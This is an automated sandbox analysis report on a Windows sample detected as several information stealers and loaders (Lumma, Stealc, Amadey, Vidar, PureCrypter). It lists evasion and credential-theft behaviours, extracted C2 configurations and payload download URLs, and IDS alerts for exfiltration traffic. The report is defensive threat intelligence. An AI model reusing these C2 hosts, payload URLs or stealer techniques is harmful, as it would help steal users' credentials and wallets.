Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1554046
MD5: a12c379025757cc07db3a875813f8b1e
SHA1: f6ef51d787cf590dce1d9f2b1cb66d4794eeb89e
SHA256: 6515d31657b9961bb6b8bf78f59a27925e6bbdefee8b91c51d4133c9aea703e1
Tags: exe, user-Bitsight

Detection

PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates HTML files with .exe extension (expired dropper behavior)
Creates multiple autostart registry keys
Detected PureCrypter Trojan
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for sample
Modifies windows update settings
Monitors registry run keys for changes
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Wscript Shell Run In CommandLine
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name: PureCrypter
Description: According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021. The malware has been observed distributing a variety of remote access trojans and information stealers. The loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software products. PureCrypter features provide persistence, injection and defense mechanisms that are configurable in Google's Protocol Buffer message format.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls it for orders. Its main functionality is loading other payloads (called "tasks") onto all, or specifically targeted, computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a fork of the Arkei stealer. It appears to be one of the first stealers to grab information on 2FA software and the Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: file.exe Avira: detected
Source: http://31.41.244.11/files/k4pDgO.ps1 Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dllLp Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php?V Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/random.exeX Avira URL Cloud: Label: phishing
Source: https://fadehairucw.store/N Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/file1.exeJ Avira URL Cloud: Label: phishing
Source: https://crisiwarny.store/8 Avira URL Cloud: Label: malware
Source: https://presticitpo.store/h Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpZ Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpX Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpS Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpd Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/o Avira URL Cloud: Label: malware
Source: http://185.215.113.16/luma/random.exey Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.phpa Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exep Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.php1t# Avira URL Cloud: Label: malware
Source: https://crisiwarny.store:443/apiv Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpr Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php%WpO Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpv Avira URL Cloud: Label: malware
Source: 00000015.00000002.2487176719.0000000000FE1000.00000040.00000001.01000000.0000000E.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 4136f86ac7.exe.9108.37.memstrmin Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: 4136f86ac7.exe.9108.37.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["navygenerayk.store", "fadehairucw.store", "necklacedmny.store", "founpiuer.store", "thumbystriw.store", "presticitpo.store", "scriptyprefej.store", "crisiwarny.store"], "Build id": "4SD0y4--legendaryy"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe ReversingLabs: Detection: 36%
Source: file.exe ReversingLabs: Detection: 36%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C636C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C636C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C78A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 0_2_6C78A9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C784440 PK11_PrivDecrypt, 0_2_6C784440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C754420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 0_2_6C754420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7844C0 PK11_PubEncrypt, 0_2_6C7844C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7D25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 0_2_6C7D25B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C768670 PK11_ExportEncryptedPrivKeyInfo, 0_2_6C768670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C78A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 0_2_6C78A650
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C76E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 0_2_6C76E6E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7AA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 0_2_6C7AA730
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7B0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 0_2_6C7B0180
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.5:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:50222 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50244 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50247 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50252 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.64.117.218:443 -> 192.168.2.5:50254 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50256 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50257 version: TLS 1.2
Source: unknown HTTPS traffic detected: 176.9.192.202:443 -> 192.168.2.5:50258 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50260 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50264 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.210.122.61:443 -> 192.168.2.5:50270 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50273 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50278 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50282 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50285 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50286 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50290 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50292 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50294 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:50296 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50297 version: TLS 1.2
Source: unknown HTTPS traffic detected: 176.9.192.202:443 -> 192.168.2.5:50298 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50301 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50303 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50304 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50306 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50309 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50311 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50313 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50316 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:50324 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2445298373.000000006C69D000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 0ac2a0f3ae.exe, 00000024.00000002.3119535099.0000000000A12000.00000040.00000001.01000000.00000019.sdmp, 0ac2a0f3ae.exe, 00000024.00000003.2983049780.0000000004F00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2445298373.000000006C69D000.00000002.00000001.01000000.0000000A.sdmp
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Directory queried: number of queries: 1583
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.5:49704
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:50229 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:50234
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50242 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50250 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.5:50259 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:61484 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057119 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store) : 192.168.2.5:65482 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:61200 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:58600 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057101 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scriptyprefej .store) : 192.168.2.5:50625 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50271 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:54900 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:54876 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50287 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50291 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50289 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:54284 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:62605 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:52747 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:56622 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:50952 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057119 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store) : 192.168.2.5:60270 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057101 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scriptyprefej .store) : 192.168.2.5:49989 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50295 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:54551 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:55296 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50307 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50319 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:49494 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:60239 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057101 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scriptyprefej .store) : 192.168.2.5:64465 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:60011 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:56957 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.5:49173 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:55407 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057119 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store) : 192.168.2.5:59274 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50323 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50327 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50244 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50247 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50247 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50244 -> 172.67.174.133:443
Source: Network traffic Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.5:50254 -> 192.64.117.218:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:50270 -> 23.210.122.61:443
